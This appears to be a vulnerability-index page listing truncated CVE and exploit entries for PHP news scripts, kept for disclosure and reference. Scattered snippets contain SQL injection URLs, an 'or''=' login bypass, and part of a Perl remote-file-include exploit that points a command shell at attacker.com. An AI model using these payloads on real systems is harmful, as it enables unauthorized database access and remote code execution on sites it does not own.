CVE-2026-5840

A security flaw has been discovered in PHPGurukul News Portal Project 4.1. Impacted is an unknown function of the file /admin/checkavailability.php. Performing a manipulation of the argument Username results in sql injection. Remote exploitation of the attack is possible. The exploit has been...

CVE-2026-5839

A vulnerability was identified in PHPGurukul News Portal Project 4.1. This issue affects some unknown processing of the file /admin/add-subcategory.php. Such manipulation of the argument sucatdescription leads to sql injection. The attack may be launched remotely. The exploit is publicly availabl...

EUVD-2009-0646

Malware in sbrugna...

EUVD-2009-0613

Malware in sbrugna...

EUVD-2006-5269

Malware in sbrugna...

EUVD-2009-2909

Malware in sbrugna...

EUVD-2008-0479

Malware in sbrugna...

CVE-2009-0610

Multiple static code injection vulnerabilities in post.php in Simple PHP News 1.0 final allow remote attackers to inject arbitrary PHP code into news.txt via the 1 title or 2 date parameter, and then execute the code via a direct request to display.php. NOTE: the provenance of this information is...

PHP NEWS 1.3.0 - Cross-Site Request Forgery (Add Admin)

========================================================================================================= Exploit Title: PHP NEWS 1.3.0 - Cross-Site Request Forgery Add Admin Author: Meryem AKDOĞAN Google Dork: - Date: 16/10/2016 Type: webapps Platform : PHP Vendor Homepage:...

PHP NEWS 1.3.0 - Cross-Site Request Forgery (Add Admin)

PHP NEWS 1.3.0 - Cross-Site Request Forgery Add Admin ========================================================================================================= Exploit Title: PHP NEWS 1.3.0 - Cross-Site Request Forgery Add Admin Author: Meryem AKDOĞAN Google Dork: - Date: 16/10/2016 Type: webapps...

PHP News Script 4.0.0 - SQL Injection

Exploit Title: PHP News Script 4.0.0 Sql Injection Date: 2015-08-01 Version: 4.0.0 Tested on: CentOSExploit :http://server/allgallery.php?id=-9999%27+sql-command+%23 Test :http://server/demo/allgallery.php?id=-100%27+union+select+user%23 !/usr/bin/env python coding: utf-8 from pocsuite.net import...

PHP News Script 4.0.0 - SQL Injection

Exploit Title: PHP News Script 4.0.0 Sql Injection Date: 2015-08-01 Exploit Author: Meisam Monsef [email protected] or [email protected] Vendor Homepage: http://phpnewsscript.com/ Version: 4.0.0 Tested on: CentOS Exploit : http://server/allgallery.php?id=-9999%27+sql-command+%23 Test :...

PHP News Reader <= 2.6.4 (phpbb.inc.php) Remote File Include Exploit

No description provided by source. !/usr/bin/perl PHP News Reader Class: Remote File Include Vulnerability Patch: unavailable Date: 2006/10/12 Remote: Yes Type: high Site: http://pnews.sourceforge.net/ use IO::Socket; use LWP::Simple; $cmdshell=http://attacker.com/cmd.txt; ====== Change This Line...

php_news 2.0 admin/catagory.php language Parameter Remote File Inclusion

No description provided by source...

PHP Enter Code Injection

Exploit Title : Php Enter Php Code Injection Author : IrIsT.Ir & Sec4Ever.com Discovered By : L3b-r1'z Home : http://IrIsT.Ir & http://Sec4Ever.com P Blob : http://L3b-r1z.com/ Software Link : http://www.phpenter.net/ Security Risk : High Version : beta Tested on : win\XP Dork : allintext: "Power...

WB News 2.3.3 Stored Cross Site Scripting

Title: WB News Webmobo 2.3.3 Stored XSS Vendor: http://www.webmobo.org/ AUTHOR: ITSecTeam Email: [email protected] Website: http://www.itsecteam.com Forum : http://forum.ITSecTeam.com Original Advisory: www.ITSecTeam.com/en/vulnerabilities/vulnerability44.htm Thanks: r3dm0v3 r3dm0v3atymail.com,...

CVE-2009-2921

Multiple SQL injection vulnerabilities in login.php in MOC Designs PHP News 1.1 allow remote attackers to execute arbitrary SQL commands via the 1 newsuser parameter User field and 2 newspassword parameter Password field...

CVE-2009-2921

CVE-2009-2921ffects MOC Designs PHP News 1.1. Multiple SQL injection vulnerabilities exist in login.php, exploitable via the newsuser (User) and newspassword (Password) fields. Remote attackers can cause arbitrary SQL execution. The provided documents do not specify the underlying root cause, aff...

CVE-2009-2921

Multiple SQL injection vulnerabilities in login.php in MOC Designs PHP News 1.1 allow remote attackers to execute arbitrary SQL commands via the 1 newsuser parameter User field and 2 newspassword parameter Password field...

MOC Designs PHP News 1.1 (Auth Bypass) SQL Injection Vulnerability

No description provided by source. + MOC Designs PHP News v1.1 Auth Bypass SQL Injection Vulnerability + Discovered By SirGod + http://insecurity-ro.org + http://h4cky0u.org + Homepage : http://www.mocdesigns.com/ + SQL Injection Auth Bypass - PoC http://127.0.0.1/news/login.php User : 'or''='...